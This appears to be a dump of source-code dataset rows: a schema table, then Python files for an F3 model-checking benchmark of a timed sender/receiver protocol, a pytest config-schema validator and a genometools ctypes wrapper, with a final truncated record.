Dataset schema (column, dtype, observed min/max; ⌀ marks nullable columns):

| column | dtype | min | max |
|---|---|---|---|
| hexsha | string (lengths) | 40 | 40 |
| size | int64 | 4 | 996k |
| ext | string (8 classes) | | |
| lang | string (1 class) | | |
| max_stars_repo_path | string (lengths) | 4 | 245 |
| max_stars_repo_name | string (lengths) | 6 | 130 |
| max_stars_repo_head_hexsha | string (lengths) | 40 | 40 |
| max_stars_repo_licenses | list (lengths) | 1 | 10 |
| max_stars_count ⌀ | int64 | 1 | 191k |
| max_stars_repo_stars_event_min_datetime ⌀ | string (lengths) | 24 | 24 |
| max_stars_repo_stars_event_max_datetime ⌀ | string (lengths) | 24 | 24 |
| max_issues_repo_path | string (lengths) | 4 | 245 |
| max_issues_repo_name | string (lengths) | 6 | 130 |
| max_issues_repo_head_hexsha | string (lengths) | 40 | 40 |
| max_issues_repo_licenses | list (lengths) | 1 | 10 |
| max_issues_count ⌀ | int64 | 1 | 67k |
| max_issues_repo_issues_event_min_datetime ⌀ | string (lengths) | 24 | 24 |
| max_issues_repo_issues_event_max_datetime ⌀ | string (lengths) | 24 | 24 |
| max_forks_repo_path | string (lengths) | 4 | 245 |
| max_forks_repo_name | string (lengths) | 6 | 130 |
| max_forks_repo_head_hexsha | string (lengths) | 40 | 40 |
| max_forks_repo_licenses | list (lengths) | 1 | 10 |
| max_forks_count ⌀ | int64 | 1 | 105k |
| max_forks_repo_forks_event_min_datetime ⌀ | string (lengths) | 24 | 24 |
| max_forks_repo_forks_event_max_datetime ⌀ | string (lengths) | 24 | 24 |
| content | string (lengths) | 4 | 996k |
| avg_line_length | float64 | 1.33 | 58.2k |
| max_line_length | int64 | 2 | 323k |
| alphanum_fraction | float64 | 0 | 0.97 |
| content_no_comment | string (lengths) | 0 | 946k |
| is_comment_constant_removed | bool (2 classes) | | |
| is_sharp_comment_removed | bool (1 class) | | |
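Before the records themselves, a minimal sketch of how rows with this schema could be inspected with the Hugging Face `datasets` library; the dataset id below is a placeholder assumption, not the actual source of this dump.

```python
# Hypothetical loading sketch; "some-org/python-source-files" is a made-up id.
from datasets import load_dataset

ds = load_dataset("some-org/python-source-files", split="train", streaming=True)
row = next(iter(ds))
# Provenance columns:
print(row["hexsha"], row["max_stars_repo_name"], row["max_stars_repo_path"])
# Pre-computed content statistics:
print(row["avg_line_length"], row["max_line_length"], row["alphanum_fraction"])
```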
hexsha: 790da02a1f4ea3a9e0f830edc861126ed46cf2b6 | size: 18,657 | ext: py | lang: Python
max_stars_repo_path: benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py | max_stars_repo_name: EnricoMagnago/F3 | max_stars_repo_head_hexsha: c863215c318d7d5f258eb9be38c6962cf6863b52 | max_stars_repo_licenses: ["MIT"] | max_stars_count: 3 | max_stars_repo_stars_event_min_datetime: 2021-04-23T23:29:26.000Z | max_stars_repo_stars_event_max_datetime: 2022-03-23T10:00:30.000Z
max_issues_repo_path: benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py | max_issues_repo_name: EnricoMagnago/F3 | max_issues_repo_head_hexsha: c863215c318d7d5f258eb9be38c6962cf6863b52 | max_issues_repo_licenses: ["MIT"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: benchmarks/f3_wrong_hints/scaling_ltl_timed_transition_system/15-sender_receiver_10.py | max_forks_repo_name: EnricoMagnago/F3 | max_forks_repo_head_hexsha: c863215c318d7d5f258eb9be38c6962cf6863b52 | max_forks_repo_licenses: ["MIT"] | max_forks_count: 1 | max_forks_repo_forks_event_min_datetime: 2021-11-17T22:02:56.000Z | max_forks_repo_forks_event_max_datetime: 2021-11-17T22:02:56.000Z
content:
from typing import FrozenSet
from collections.abc import Iterable
from math import log, ceil
from mathsat import msat_term, msat_env
from mathsat import msat_make_constant, msat_declare_function
from mathsat import msat_get_integer_type, msat_get_rational_type, msat_get_bool_type
from mathsat import msat_make_and, msat_make_not, msat_make_or, msat_make_iff
from mathsat import msat_make_leq, msat_make_equal, msat_make_true
from mathsat import msat_make_number, msat_make_plus, msat_make_times
from pysmt.environment import Environment as PysmtEnv
import pysmt.typing as types
from ltl.ltl import TermMap, LTLEncoder
from utils import name_next, symb_to_next
from hint import Hint, Location
delta_name = "delta"
def decl_consts(menv: msat_env, name: str, c_type) -> tuple:
assert not name.startswith("_"), name
s = msat_declare_function(menv, name, c_type)
s = msat_make_constant(menv, s)
x_s = msat_declare_function(menv, name_next(name), c_type)
x_s = msat_make_constant(menv, x_s)
return s, x_s
def make_enum(menv, v_name: str, enum_size: int):
bool_type = msat_get_bool_type(menv)
num_bits = ceil(log(enum_size, 2))
b_vars = []
for idx in range(num_bits):
c_name = "{}{}".format(v_name, idx)
b_vars.append(tuple(decl_consts(menv, c_name, bool_type)))
vals = []
x_vals = []
for enum_val in range(enum_size):
bit_val = format(enum_val, '0{}b'.format(num_bits))
assert len(bit_val) == num_bits
assert all(c in {'0', '1'} for c in bit_val)
assign = [b_vars[idx] if c == '1' else
(msat_make_not(menv, b_vars[idx][0]),
msat_make_not(menv, b_vars[idx][1]))
for idx, c in enumerate(reversed(bit_val))]
pred = assign[0][0]
x_pred = assign[0][1]
for it in assign[1:]:
pred = msat_make_and(menv, pred, it[0])
x_pred = msat_make_and(menv, x_pred, it[1])
vals.append(pred)
x_vals.append(x_pred)
assert len(vals) == enum_size
assert len(x_vals) == enum_size
return b_vars, vals, x_vals
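# Worked example of the encoding above: for enum_size=3, num_bits =
# ceil(log(3, 2)) = 2 and format(2, '02b') == '10', so enum value 2 asserts
# boolean var 1 and negates var 0; bit_val is enumerated reversed so that
# index 0 is the least-significant bit.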
def msat_make_minus(menv: msat_env, arg0: msat_term, arg1: msat_term):
m_one = msat_make_number(menv, "-1")
arg1 = msat_make_times(menv, arg1, m_one)
return msat_make_plus(menv, arg0, arg1)
def msat_make_lt(menv: msat_env, arg0: msat_term, arg1: msat_term):
geq = msat_make_geq(menv, arg0, arg1)
return msat_make_not(menv, geq)
def msat_make_geq(menv: msat_env, arg0: msat_term, arg1: msat_term):
return msat_make_leq(menv, arg1, arg0)
def msat_make_gt(menv: msat_env, arg0: msat_term, arg1: msat_term):
leq = msat_make_leq(menv, arg0, arg1)
return msat_make_not(menv, leq)
def msat_make_impl(menv: msat_env, arg0: msat_term, arg1: msat_term):
n_arg0 = msat_make_not(menv, arg0)
return msat_make_or(menv, n_arg0, arg1)
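# The helpers above derive the comparisons and implication missing from the
# imported mathsat primitives: a < b is !(a >= b), a >= b is b <= a,
# a > b is !(a <= b), and a -> b is !a | b.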
def diverging_symbs(menv: msat_env) -> frozenset:
real_type = msat_get_rational_type(menv)
delta = msat_declare_function(menv, delta_name, real_type)
delta = msat_make_constant(menv, delta)
return frozenset([delta])
def check_ltl(menv: msat_env, enc: LTLEncoder) -> (Iterable, msat_term,
msat_term, msat_term):
assert menv
assert isinstance(menv, msat_env)
assert enc
assert isinstance(enc, LTLEncoder)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
r2s, x_r2s = decl_consts(menv, "r2s", int_type)
s2r, x_s2r = decl_consts(menv, "s2r", int_type)
delta, x_delta = decl_consts(menv, delta_name, real_type)
sender = Sender("s", menv, enc, r2s, x_r2s, s2r, x_s2r, delta)
receiver = Receiver("r", menv, enc, s2r, x_s2r, r2s, x_r2s, delta)
curr2next = {r2s: x_r2s, s2r: x_s2r, delta: x_delta}
for comp in [sender, receiver]:
for s, x_s in comp.symb2next.items():
curr2next[s] = x_s
zero = msat_make_number(menv, "0")
init = msat_make_and(menv, receiver.init, sender.init)
trans = msat_make_and(menv, receiver.trans, sender.trans)
# invar delta >= 0
init = msat_make_and(menv, init,
msat_make_geq(menv, delta, zero))
trans = msat_make_and(menv, trans,
msat_make_geq(menv, x_delta, zero))
# delta > 0 -> (r2s' = r2s & s2r' = s2r)
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_equal(menv, x_r2s, r2s),
msat_make_equal(menv, x_s2r, s2r))
trans = msat_make_and(menv, trans,
msat_make_impl(menv, lhs, rhs))
# (G F !s.stutter) -> G (s.wait_ack -> F s.send)
lhs = enc.make_G(enc.make_F(msat_make_not(menv, sender.stutter)))
rhs = enc.make_G(msat_make_impl(menv, sender.wait_ack,
enc.make_F(sender.send)))
ltl = msat_make_impl(menv, lhs, rhs)
return TermMap(curr2next), init, trans, ltl
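# check_ltl hands the model checker everything it needs: the current-to-next
# symbol map, the initial-state predicate, the transition relation, and the
# LTL property (G F !s.stutter) -> G (s.wait_ack -> F s.send).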
class Module:
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
*args, **kwargs):
self.name = name
self.menv = menv
self.enc = enc
self.symb2next = {}
true = msat_make_true(menv)
self.init = true
self.trans = true
def _symb(self, v_name, v_type):
v_name = "{}_{}".format(self.name, v_name)
return decl_consts(self.menv, v_name, v_type)
def _enum(self, v_name: str, enum_size: int):
c_name = "{}_{}".format(self.name, v_name)
return make_enum(self.menv, c_name, enum_size)
class Sender(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
int_type = msat_get_integer_type(menv)
real_type = msat_get_rational_type(menv)
loc, x_loc = self._symb("l", bool_type)
evt, x_evt = self._symb("evt", bool_type)
msg_id, x_msg_id = self._symb("msg_id", int_type)
timeout, x_timeout = self._symb("timeout", real_type)
c, x_c = self._symb("c", real_type)
self.move = evt
self.stutter = msat_make_not(menv, evt)
self.x_move = x_evt
self.x_stutter = msat_make_not(menv, x_evt)
self.send = loc
self.wait_ack = msat_make_not(menv, loc)
self.x_send = x_loc
self.x_wait_ack = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc, evt: x_evt, msg_id: x_msg_id,
timeout: x_timeout, c: x_c}
zero = msat_make_number(menv, "0")
one = msat_make_number(menv, "1")
base_timeout = one
# send & c = 0 & msg_id = 0
self.init = msat_make_and(menv,
msat_make_and(menv, self.send,
msat_make_equal(menv, c,
zero)),
msat_make_equal(menv, msg_id, zero))
# invar: wait_ack -> c <= timeout
self.init = msat_make_and(
menv, self.init,
msat_make_impl(menv, self.wait_ack,
msat_make_leq(menv, c, timeout)))
self.trans = msat_make_impl(menv, self.x_wait_ack,
msat_make_leq(menv, x_c, x_timeout))
# delta > 0 | stutter -> l' = l & msg_id' = msg_id & timeout' = timeout &
# c' = c + delta & out_c' = out_c
lhs = msat_make_or(menv, msat_make_gt(menv, delta, zero), self.stutter)
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_msg_id, msg_id)),
msat_make_and(menv,
msat_make_equal(menv, x_timeout, timeout),
msat_make_equal(menv, x_c,
msat_make_plus(menv, c, delta))))
rhs = msat_make_and(menv, rhs,
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
disc_t = msat_make_and(menv, self.move,
msat_make_equal(menv, delta, zero))
# (send & send') ->
# (msg_id' = msg_id & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_send))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id, msg_id),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (send & wait_ack') ->
# (msg_id' = msg_id + 1 & timeout' = base_timeout & c' = 0 & out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.send, self.x_wait_ack))
rhs = msat_make_and(
menv,
msat_make_and(menv,
msat_make_equal(menv, x_msg_id,
msat_make_plus(menv, msg_id, one)),
msat_make_equal(menv, x_timeout, base_timeout)),
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c, out_c)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
        # (wait_ack) -> (c' = 0 & out_c' = out_c &
        #               (wait_ack' <-> (in_c != msg_id & c >= timeout)))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs_iff = msat_make_and(menv,
msat_make_not(menv,
msat_make_equal(menv, in_c,
msg_id)),
msat_make_geq(menv, c, timeout))
rhs_iff = msat_make_iff(menv, self.x_wait_ack, rhs_iff)
rhs = msat_make_and(menv,
msat_make_and(menv,
msat_make_equal(menv, x_c, zero),
msat_make_equal(menv, x_out_c,
out_c)),
rhs_iff)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & wait_ack') -> (timeout' > timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack,
self.x_wait_ack))
rhs = msat_make_gt(menv, x_timeout, timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack) -> (send' <-> (in_c = msg_id & c < timeout))
lhs = msat_make_and(menv, disc_t, self.wait_ack)
rhs = msat_make_iff(menv, self.x_send,
msat_make_and(menv,
msat_make_equal(menv, in_c, msg_id),
msat_make_lt(menv, c, timeout)))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait_ack & send') -> (timeout' = base_timeout)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait_ack, self.x_send))
rhs = msat_make_equal(menv, x_timeout, base_timeout)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
class Receiver(Module):
def __init__(self, name: str, menv: msat_env, enc: LTLEncoder,
in_c, x_in_c, out_c, x_out_c, delta):
super().__init__(name, menv, enc)
bool_type = msat_get_bool_type(menv)
loc, x_loc = self._symb("l", bool_type)
self.wait = loc
self.work = msat_make_not(menv, loc)
self.x_wait = x_loc
self.x_work = msat_make_not(menv, x_loc)
self.symb2next = {loc: x_loc}
zero = msat_make_number(menv, "0")
# wait
self.init = self.wait
# delta > 0 -> loc' = loc & out_c' = out_c
lhs = msat_make_gt(menv, delta, zero)
rhs = msat_make_and(menv,
msat_make_iff(menv, x_loc, loc),
msat_make_equal(menv, x_out_c, out_c))
self.trans = msat_make_impl(menv, lhs, rhs)
disc_t = msat_make_equal(menv, delta, zero)
# wait -> (wait' <-> in_c = out_c)
lhs = msat_make_and(menv, disc_t, self.wait)
rhs = msat_make_iff(menv, self.x_wait,
msat_make_equal(menv, in_c, out_c))
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & wait') -> (out_c' = out_c)
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_wait))
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# (wait & work') -> out_c' = in_c
lhs = msat_make_and(menv, disc_t,
msat_make_and(menv, self.wait, self.x_work))
rhs = msat_make_equal(menv, x_out_c, in_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
# work -> out_c' = out_c
lhs = msat_make_and(menv, disc_t, self.work)
rhs = msat_make_equal(menv, x_out_c, out_c)
self.trans = msat_make_and(menv, self.trans,
msat_make_impl(menv, lhs, rhs))
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
delta = mgr.Symbol(delta_name, types.REAL)
r2s = mgr.Symbol("r2s", types.INT)
    s2r = mgr.Symbol("s2r", types.INT)
s_l = mgr.Symbol("s_l", types.BOOL)
s_evt = mgr.Symbol("s_evt", types.BOOL)
s_msg_id = mgr.Symbol("s_msg_id", types.INT)
s_timeout = mgr.Symbol("s_timeout", types.REAL)
s_c = mgr.Symbol("s_c", types.REAL)
r_l = mgr.Symbol("r_l", types.BOOL)
symbs = frozenset([delta, r2s, s2r, s_l, s_evt, s_msg_id, s_timeout, s_c,
r_l])
x_delta = symb_to_next(mgr, delta)
x_r2s = symb_to_next(mgr, r2s)
x_s2r = symb_to_next(mgr, s2r)
x_s_l = symb_to_next(mgr, s_l)
x_s_evt = symb_to_next(mgr, s_evt)
x_s_msg_id = symb_to_next(mgr, s_msg_id)
x_s_timeout = symb_to_next(mgr, s_timeout)
x_s_c = symb_to_next(mgr, s_c)
x_r_l = symb_to_next(mgr, r_l)
res = []
r0 = mgr.Real(0)
r1 = mgr.Real(1)
i0 = mgr.Int(0)
i1 = mgr.Int(1)
loc0 = Location(env, mgr.Equals(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, r0))
hint = Hint("h_delta0", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i0))
hint = Hint("h_s2r0", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(0, x_s_evt)
hint = Hint("h_s_evt0", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, i0))
hint = Hint("h_s_msg_id0", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.Equals(s_c, r0))
loc0.set_progress(0, mgr.Equals(x_s_c, r0))
hint = Hint("h_s_c0", env, frozenset([s_c]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(0, x_r_l)
hint = Hint("h_r_l0", env, frozenset([r_l]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, i1))
hint = Hint("h_s2r1", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(r2s, i0))
loc0.set_progress(0, mgr.Equals(x_r2s, i1))
hint = Hint("h_r2s1", env, frozenset([r2s]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, s_l)
loc0.set_progress(1, mgr.Not(x_s_l))
loc1 = Location(env, mgr.Not(s_l))
loc1.set_progress(0, x_s_l)
hint = Hint("h_s_l1", env, frozenset([s_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, s_evt)
loc0.set_progress(1, mgr.Not(x_s_evt))
loc1 = Location(env, mgr.Not(s_evt))
loc1.set_progress(0, x_s_evt)
hint = Hint("h_s_evt1", env, frozenset([s_evt]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(s_msg_id, i0))
loc0.set_progress(0, mgr.Equals(x_s_msg_id, mgr.Plus(s_msg_id, i1)))
hint = Hint("h_s_msg_id1", env, frozenset([s_msg_id]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s_timeout, r0))
loc0.set_progress(0, mgr.Equals(x_s_timeout, mgr.Plus(s_timeout, r1)))
hint = Hint("h_s_timeout1", env, frozenset([s_timeout]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, r_l)
loc0.set_progress(1, mgr.Not(x_r_l))
loc1 = Location(env, mgr.Not(r_l))
loc1.set_progress(0, x_r_l)
hint = Hint("h_r_l1", env, frozenset([r_l]), symbs)
hint.set_locs([loc0, loc1])
res.append(hint)
loc0 = Location(env, mgr.GE(delta, r0))
loc0.set_progress(0, mgr.Equals(x_delta, mgr.Plus(delta, r1)))
hint = Hint("h_delta2", env, frozenset([delta]), symbs)
hint.set_locs([loc0])
res.append(hint)
loc0 = Location(env, mgr.GE(s2r, i0))
loc0.set_progress(0, mgr.Equals(x_s2r, mgr.Plus(s2r, i1)))
hint = Hint("h_s2r2", env, frozenset([s2r]), symbs)
hint.set_locs([loc0])
res.append(hint)
return frozenset(res)
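# Structure of the hints above: each Location carries a region formula, and
# set_progress(i, f) links it to the location at index i under transition
# formula f; a Hint groups the locations for the symbols it owns. The
# two-location hints (h_s_l1, h_s_evt1, h_r_l1) alternate between a
# predicate and its negation.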
avg_line_length: 38.388889 | max_line_length: 89 | alphanum_fraction: 0.577049
content_no_comment: (near-duplicate of the content above with some comment lines removed; omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
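The three numeric columns in each record can be recomputed from `content`. The exact definitions below are inferred from the column names and the values shown above, so treat this as a sketch rather than the dataset's reference implementation.

```python
def content_stats(content: str):
    """Recompute avg_line_length, max_line_length and alphanum_fraction
    (assumed definitions: per-line character counts and the share of
    alphanumeric characters over the whole file)."""
    lines = content.split("\n")
    avg_line_length = sum(len(line) for line in lines) / len(lines)
    max_line_length = max(len(line) for line in lines)
    alphanum_fraction = sum(ch.isalnum() for ch in content) / len(content)
    return avg_line_length, max_line_length, alphanum_fraction
```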
hexsha: 790da3fb01143d681327600c538468b2c14e75f6 | size: 392 | ext: py | lang: Python
max_stars_repo_path: test_validate_input_file.py | max_stars_repo_name: cszelesbbs/servicecatalogenabler2 | max_stars_repo_head_hexsha: f3ece5e49f047b45e796a7656816d7603877ec70 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: null | max_stars_repo_stars_event_min_datetime: null | max_stars_repo_stars_event_max_datetime: null
max_issues_repo_path: test_validate_input_file.py | max_issues_repo_name: cszelesbbs/servicecatalogenabler2 | max_issues_repo_head_hexsha: f3ece5e49f047b45e796a7656816d7603877ec70 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: test_validate_input_file.py | max_forks_repo_name: cszelesbbs/servicecatalogenabler2 | max_forks_repo_head_hexsha: f3ece5e49f047b45e796a7656816d7603877ec70 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
import json
import yaml
from jsonschema import validate
import os
configuration_file = os.environ['SC_ENABLER_CONF']
with open(configuration_file, 'r') as conf_file:
input_config = yaml.safe_load(conf_file)
with open("./input_schema_validator.json", 'r') as schema_file:
schema = json.load(schema_file)
def test_input_params():
validate(instance=input_config, schema=schema)
avg_line_length: 23.058824 | max_line_length: 63 | alphanum_fraction: 0.772959
content_no_comment: (byte-identical to the content above, as the file contains no comments; omitted)
is_comment_constant_removed: true | is_sharp_comment_removed: true
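The test in this record is the file's whole contract: `jsonschema.validate` returns None on success and raises `ValidationError` on mismatch, so pytest passes exactly when the YAML config matches the schema. A self-contained sketch of that behaviour; the schema here is a made-up stand-in for input_schema_validator.json:

```python
from jsonschema import validate, ValidationError

# Made-up schema standing in for input_schema_validator.json.
schema = {
    "type": "object",
    "properties": {"portfolio": {"type": "string"}},
    "required": ["portfolio"],
}

validate(instance={"portfolio": "demo"}, schema=schema)  # passes silently
try:
    validate(instance={}, schema=schema)  # missing required key
except ValidationError as err:
    print(err.message)  # "'portfolio' is a required property"
```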
hexsha: 790da45c9689d6ffd0b636d581f5ce7ab96fe34b | size: 3,532 | ext: py | lang: Python
max_stars_repo_path: gtpython/gt/annotationsketch/image_info.py | max_stars_repo_name: ggonnella/genometools | max_stars_repo_head_hexsha: 48103b35c99920179fae697086efdf6d0548a1fe | max_stars_repo_licenses: ["BSD-2-Clause"] | max_stars_count: 1 | max_stars_repo_stars_event_min_datetime: 2020-02-19T14:10:38.000Z | max_stars_repo_stars_event_max_datetime: 2020-02-19T14:10:38.000Z
max_issues_repo_path: gtpython/gt/annotationsketch/image_info.py | max_issues_repo_name: ggonnella/genometools | max_issues_repo_head_hexsha: 48103b35c99920179fae697086efdf6d0548a1fe | max_issues_repo_licenses: ["BSD-2-Clause"] | max_issues_count: null | max_issues_repo_issues_event_min_datetime: null | max_issues_repo_issues_event_max_datetime: null
max_forks_repo_path: gtpython/gt/annotationsketch/image_info.py | max_forks_repo_name: ggonnella/genometools | max_forks_repo_head_hexsha: 48103b35c99920179fae697086efdf6d0548a1fe | max_forks_repo_licenses: ["BSD-2-Clause"] | max_forks_count: null | max_forks_repo_forks_event_min_datetime: null | max_forks_repo_forks_event_max_datetime: null
content:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 Daniel Standage <daniel.standage@gmail.com>
# Copyright (c) 2008 Sascha Steinbiss <steinbiss@zbh.uni-hamburg.de>
# Copyright (c) 2008 Center for Bioinformatics, University of Hamburg
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from gt.dlload import gtlib
from gt.annotationsketch.rec_map import RecMap
import math
class ImageInfo:
def __init__(self):
self.ii = gtlib.gt_image_info_new()
self._as_parameter_ = self.ii
self.hotspots = None
def __del__(self):
try:
gtlib.gt_image_info_delete(self.ii)
except AttributeError:
pass
    def from_param(cls, obj):
        if not (isinstance(obj, ImageInfo) or obj is None):
            raise TypeError("argument must be an ImageInfo")
        if obj is None:
            return None
        return obj._as_parameter_
from_param = classmethod(from_param)
def get_height(self):
return gtlib.gt_image_info_get_height(self.ii)
def num_of_rec_maps(self):
return gtlib.gt_image_info_num_of_rec_maps(self.ii)
def compare_hotspots(cls, hs1, hs2):
if hs1[2] - hs1[0] + 1 > hs2[2] - hs2[0] + 1:
return 1
elif hs1[2] - hs1[0] + 1 == hs2[2] - hs2[0] + 1:
if hs1[3] > hs2[3]:
return 1
elif hs1[3] == hs2[3]:
return 0
else:
return -1
else:
return -1
compare_hotspots = classmethod(compare_hotspots)
def each_hotspot(self):
if not self.hotspots:
self.hotspots = []
for i in range(self.num_of_rec_maps()):
rm = RecMap(gtlib.gt_image_info_get_rec_map(self.ii, i))
self.hotspots.append([math.floor(rm.get_northwest_x()),
math.floor(rm.get_northwest_y()), math.floor(rm.get_southeast_x()),
math.floor(rm.get_southeast_y()), rm.get_genome_feature()])
self.hotspots.sort(ImageInfo.compare_hotspots)
for hs in self.hotspots:
yield (hs[0], hs[1], hs[2], hs[3], hs[4])
def register(cls, gtlib):
from ctypes import c_void_p, c_ulong, c_uint
gtlib.gt_image_info_delete.restype = None
gtlib.gt_image_info_delete.argtypes = [c_void_p]
gtlib.gt_image_info_get_rec_map.restype = c_void_p
gtlib.gt_image_info_get_rec_map.argtypes = [c_void_p, c_ulong]
gtlib.gt_image_info_num_of_rec_maps.restype = c_ulong
gtlib.gt_image_info_num_of_rec_maps.argtypes = [c_void_p]
gtlib.gt_image_info_get_height.restype = c_uint
gtlib.gt_image_info_get_height.argtypes = [c_void_p]
gtlib.gt_image_info_new.restype = c_void_p
gtlib.gt_image_info_new.argtypes = []
register = classmethod(register)
avg_line_length: 37.178947 | max_line_length: 91 | alphanum_fraction: 0.656569
content_no_comment: (identical to the content above minus the shebang and license-header comments; omitted)
is_comment_constant_removed: false | is_sharp_comment_removed: true
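ImageInfo.register in the record above follows the standard ctypes pattern: declare `restype` and `argtypes` once per foreign function so later calls are marshalled correctly (without a declared restype, ctypes assumes a C int and can truncate 64-bit pointers). A minimal standalone sketch of the same pattern, assuming a Unix-like system with a loadable libc:

```python
import ctypes
import ctypes.util

libc = ctypes.CDLL(ctypes.util.find_library("c"))
# Declare the C signature: size_t strlen(const char *s);
libc.strlen.restype = ctypes.c_size_t
libc.strlen.argtypes = [ctypes.c_char_p]
assert libc.strlen(b"hello") == 5
```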
hexsha: 790da6152f12e012efa9bdc9399809ed616980f1 | size: 77,846 | ext: py | lang: Python
max_stars_repo_path: pysnmp/HUAWEI-RSVPTE-MIB.py | max_stars_repo_name: agustinhenze/mibs.snmplabs.com | max_stars_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_stars_repo_licenses: ["Apache-2.0"] | max_stars_count: 11 | max_stars_repo_stars_event_min_datetime: 2021-02-02T16:27:16.000Z | max_stars_repo_stars_event_max_datetime: 2021-08-31T06:22:49.000Z
max_issues_repo_path: pysnmp/HUAWEI-RSVPTE-MIB.py | max_issues_repo_name: agustinhenze/mibs.snmplabs.com | max_issues_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_issues_repo_licenses: ["Apache-2.0"] | max_issues_count: 75 | max_issues_repo_issues_event_min_datetime: 2021-02-24T17:30:31.000Z | max_issues_repo_issues_event_max_datetime: 2021-12-08T00:01:18.000Z
max_forks_repo_path: pysnmp/HUAWEI-RSVPTE-MIB.py | max_forks_repo_name: agustinhenze/mibs.snmplabs.com | max_forks_repo_head_hexsha: 1fc5c07860542b89212f4c8ab807057d9a9206c7 | max_forks_repo_licenses: ["Apache-2.0"] | max_forks_count: 10 | max_forks_repo_forks_event_min_datetime: 2019-04-30T05:51:36.000Z | max_forks_repo_forks_event_max_datetime: 2022-02-16T03:33:41.000Z
content:
#
